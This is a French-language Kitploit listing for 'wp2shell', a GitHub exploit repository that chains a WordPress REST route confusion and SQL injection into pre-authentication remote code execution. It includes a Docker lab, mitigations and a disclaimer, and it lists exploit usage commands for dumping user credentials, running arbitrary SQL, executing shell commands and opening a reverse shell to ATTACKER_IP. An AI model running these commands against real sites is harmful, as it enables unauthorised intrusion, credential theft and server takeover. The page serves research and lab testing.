Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

CVE-2026-63030-CVE-2026-60137

Exploit RCE pré-authentification pour WordPress (CVE-2026-63030 + CVE-2026-60137) enchaînant la confusion de route et l'injection SQL pour obtenir un accès shell complet. Comprend un laboratoire Docker pour des tests sûrs.

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-63030 & CVE-2026-60137 — wp2shell

RCE pré-auth du noyau WordPress — Confusion de route + injection SQL enchaînées pour aboutir à une exécution de code à distance

CVECVE-2026-63030 + CVE-2026-60137
Aliaswp2shell
Type de vulnérabilitéREST API Route Confusion → SQL Injection → RCE
SévéritéCritique — CVSS 10.0
Versions affectéesWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
Corrigé dansWordPress 6.8.6, 6.9.5, 7.0.2
Authentification requiseAucune (pré-auth)

Aperçu

wp2shell est le nom donné à la chaîne d'exploitation combinant 2 vulnérabilités dans WordPress Core :

  • CVE-2026-63030 — Route Confusion : le batch endpoint (/wp-json/batch/v1) a un décalage d'index entre les tableaux $matches[] et $validation[] lorsqu'une sous-requête a un chemin invalide, ce qui fait que la sous-requête suivante s'exécute sous un mauvais handler → contournement de la validation de schéma de l'API REST.
  • CVE-2026-60137 — SQL Injection : WP_Query::get_posts() ne nettoie pas le paramètre author__not_in lorsqu'il reçoit une chaîne au lieu d'un tableau → injection SQL brute.

Les deux bugs combinés forment une chaîne Pre-Auth RCE complète — de 0 identifiant à un shell sur le serveur, uniquement via des requêtes HTTP.

Chaîne d'exploitation

root@kitploit:~
Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

Lisez l'analyse technique complète dans REPORT.md


Configuration du lab

Le lab utilise Docker Compose avec 3 conteneurs :

ConteneurImagePort
WordPress (vulnérable)wordpress:6.9.48080
MySQLmysql:8.0interne
phpMyAdminphpmyadmin:latest8081

Prérequis

  • Docker + Docker Compose
  • Python 3.8+ (stdlib uniquement, sans installation de paquets supplémentaires)
  • Bash (pour exécuter setup.sh)

Démarrage

root@kitploit:~
cd wp2shell-lab
bash setup.sh

Le script automatise :

  1. Tire les images et démarre les conteneurs
  2. Installe WordPress 6.9.4
  3. Initialise les données d'exemple (articles, utilisateurs)
  4. Active le journal général MySQL + WP_DEBUG

Une fois terminé, "WP2Shell Lab — READY!" s'affiche avec les informations de connexion.

Nettoyage

root@kitploit:~
cd wp2shell-lab
docker compose down -v

Utilisation de l'exploit

root@kitploit:~
# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

Le script PoC a été réécrit à partir de zéro, en s'inspirant de Icex0/wp2shell-poc. Il utilise uniquement la stdlib de Python 3, aucune dépendance supplémentaire à installer.


Conditions d'exploitation

ConditionExigence
Version de WordPress6.9.0–6.9.4 ou 7.0.0–7.0.1
Endpoint batch de l'API RESTAccessible (activé par défaut)
AuthentificationAucune
RéseauL'attaquant peut atteindre WordPress

Mesures d'atténuation

  1. Mettez à niveau WordPress vers >= 6.9.5 ou >= 7.0.2 — la seule solution définitive.
  2. Désactivez temporairement l'endpoint batch : ajoutez add_filter('rest_batch_disabled', '__return_true'); dans functions.php.
  3. Règle WAF : bloquez les requêtes vers /wp-json/batch/v1 contenant des mots-clés SQL.

Avertissement

Ce dépôt a été créé à des fins de recherche, d'apprentissage et de CTF dans un environnement de lab contrôlé. Ne l'utilisez pas pour attaquer des systèmes réels. Toute exploitation non autorisée est une violation de la loi.


Références

  • Icex0/wp2shell-poc — PoC original de référence
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
Télécharger l’outil